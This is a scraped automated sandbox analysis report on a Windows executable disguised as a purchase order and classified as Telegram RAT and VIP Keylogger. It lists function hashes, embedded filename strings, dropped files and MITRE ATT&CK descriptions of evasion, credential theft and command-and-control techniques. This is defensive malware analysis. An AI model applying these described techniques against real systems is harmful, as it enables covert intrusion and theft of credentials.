Opcode ID: 609a373d17ff96524ac84adc7ec2e1f9e2861d28ca9e8f45d5e991f4f2405ea3
Instruction ID: 0ff1d7640a077de49a55dba640185ef106f5f7c22a2b70172fd68bfcfbabada0
Opcode Fuzzy Hash: 609a373d17ff96524ac84adc7ec2e1f9e2861d28ca9e8f45d5e991f4f2405ea3
Instruction Fuzzy Hash: 65F0F631905298DFCF028B699C446EEBFF5EF89320F04C066E648C7212D3754D15CB91

Function 00D4D01F Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4167615865.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d4d000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f88a7d9b9b86022d73500461745e31f16f9e9e4f8de9bc10557e4d4c9bfd24
Instruction ID: 355cf647eb2408fd6cd397421697dd54ef675acc94fc9d704a6c9603c097c99f
Opcode Fuzzy Hash: 97f88a7d9b9b86022d73500461745e31f16f9e9e4f8de9bc10557e4d4c9bfd24
Instruction Fuzzy Hash: 15F0F976600604AF97208F0AD885C23FBADFBC4770759C59AE84A5B612C671EC42CEB0

Function 0273FDE0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a0cb3d26c3024b47a635bf537e89d96fe7527b93728d685e685d354f8ea46b
Instruction ID: 3cab627ee5259c1bd4818d14012ea26cffb04a06286d5f1082c599bf5231e8e7
Opcode Fuzzy Hash: 25a0cb3d26c3024b47a635bf537e89d96fe7527b93728d685e685d354f8ea46b
Instruction Fuzzy Hash: CAF03770E0422D9FDB45EFA9C9156AEBFF6AB88240F14842AD509E7242DB744A01CBE1

Function 02736739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c32aef1c4f0671d747b20e390588d2612d9b914b5928c1df38117f2cb8da776
Instruction ID: 0d82104495a0fb5c823a44569359853400bfbfadf3f0c335bc38bd1f94cb6027
Opcode Fuzzy Hash: 8c32aef1c4f0671d747b20e390588d2612d9b914b5928c1df38117f2cb8da776
Instruction Fuzzy Hash: 42E0C23040C3961ECB13E734AC9D458BF2EEB42204B5485A1E0014A6AFDFB068598768

Function 027328A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2179137f03e8f65178412a5132926d0c1ce5d5199d4355ea254f07f27dd01a3
Instruction ID: 8908151b306322b0866641ac44d628c42b0a0bb0a3cca6512ecce96826c35596
Opcode Fuzzy Hash: e2179137f03e8f65178412a5132926d0c1ce5d5199d4355ea254f07f27dd01a3
Instruction Fuzzy Hash: B6E02631E543668BCB02EBF09C140FEBB34ADC2221B08859BC0A437090EB30621AC3A2

Function 027328B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a07a8d2d1bc7fa43e8ceb961c633e683d2d42ed6f53d8fa482f576df58c2997
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 7a07a8d2d1bc7fa43e8ceb961c633e683d2d42ed6f53d8fa482f576df58c2997
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 0273AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3dedade4c94517d3eab3d708a18528070fdbeff41ba1a620ca437d09528dd9
Instruction ID: ec812bdbfd1f860c00c08f6c1223c9ed2a84c47a776fb38043fb9866704625c3
Opcode Fuzzy Hash: 9c3dedade4c94517d3eab3d708a18528070fdbeff41ba1a620ca437d09528dd9
Instruction Fuzzy Hash: 1FD0673AB40118DFCB049F99E8808DDF7B6FB98321B148516E915A3265C6319925DB54

Function 02736748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f345c14a3cec3cac26ec05e4e764e95a75ea634c6330870b28877c5a90444df
Instruction ID: d96f86f97347990928037e22140dc9e24cc15267cd136cb8fd2d119c6907adc7
Opcode Fuzzy Hash: 5f345c14a3cec3cac26ec05e4e764e95a75ea634c6330870b28877c5a90444df
Instruction Fuzzy Hash: 88C012304587184FC501F765ED85555B71EF7802047509520A0050A69EDFB4698D96A4

Non-executed Functions

Function 02736920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 0273692C
\;^q, xrefs: 0273695E
\;^q, xrefs: 02736952
\;^q, xrefs: 02736936

Memory Dump Source

Source File: 00000004.00000002.4168435783.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2730000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 443102649c2dda83ece0edc0d634493681245864d03154ecc6064f91ad6e28aa
Instruction ID: ae52bf41de4c282cb34d15f92c4ffdbddd1f8b4e00edb1e46c424d5330915e5b
Opcode Fuzzy Hash: 443102649c2dda83ece0edc0d634493681245864d03154ecc6064f91ad6e28aa
Instruction Fuzzy Hash: 3B01BC31B40114AFCB6E8E2CC544A2537EFAF88B60725446EE446DF3B6EA31DC41C748

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000000.1703117561.0000000000732000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamercnOB.exe" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786532763.0000000005550000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamercnOB.exe" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1787406592.0000000007110000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4176013298.0000000004DA9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Binary or memory string: OriginalFilenamercnOB.exe" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_timm110q.uub.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vql3nvnb.wkv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxcxcazm.2v2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsok3sld.g2j.ps1

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Function 02B676C8 Relevance: 13.2, Strings: 10, Instructions: 736
COMMON

Function 02B676B8 Relevance: 13.2, Strings: 10, Instructions: 675
COMMON

Function 0751A708 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 554
COMMON

Function 070203C8 Relevance: 6.9, Strings: 5, Instructions: 651
COMMON

Function 0C468CB8 Relevance: 5.3, Strings: 4, Instructions: 266
COMMON

Function 0751A6F8 Relevance: 3.3, APIs: 2, Instructions: 315
COMMON

Function 00F9D149 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Function 00F9D158 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre